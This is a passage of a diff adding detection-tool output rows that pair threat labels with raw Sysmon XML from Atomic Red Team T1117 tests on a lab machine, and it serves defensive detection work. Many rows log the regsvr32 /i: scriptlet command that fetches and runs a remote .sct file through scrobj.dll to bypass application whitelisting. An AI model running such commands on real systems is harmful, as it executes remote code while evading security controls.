+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.204886Z"">
+    </TimeCreated>
+    <EventRecordID>4041</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.135</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00105DA83800</Data>
+    <Data Name=""ProcessId"">4336</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
+    <Data Name=""ParentProcessId"">2076</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
+    </TimeCreated>
+    <EventRecordID>4038</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
+    <Data Name=""ProcessId"">2076</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
+    <Data Name=""ParentProcessId"">2832</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
+    </TimeCreated>
+    <EventRecordID>4038</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
+    <Data Name=""ProcessId"">2076</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
+    <Data Name=""ParentProcessId"">2832</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
+    </TimeCreated>
+    <EventRecordID>4038</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
+    <Data Name=""ProcessId"">2076</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
+    <Data Name=""ParentProcessId"">2832</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
+    </TimeCreated>
+    <EventRecordID>4037</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
+    <Data Name=""ProcessId"">2832</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
+    </TimeCreated>
+    <EventRecordID>4037</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
+    <Data Name=""ProcessId"">2832</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:43.574378Z"">
+    </TimeCreated>
+    <EventRecordID>4036</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:43.460</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-0010771B3800</Data>
+    <Data Name=""ProcessId"">1476</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:43.445040Z"">
+    </TimeCreated>
+    <EventRecordID>4035</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:43.339</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-00100A0E3800</Data>
+    <Data Name=""ProcessId"">3848</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
+    <Data Name=""ParentProcessId"">2332</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
+    </TimeCreated>
+    <EventRecordID>4033</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
+    <Data Name=""ProcessId"">2332</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
+    <Data Name=""ParentProcessId"">4444</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
+    </TimeCreated>
+    <EventRecordID>4033</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
+    <Data Name=""ProcessId"">2332</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
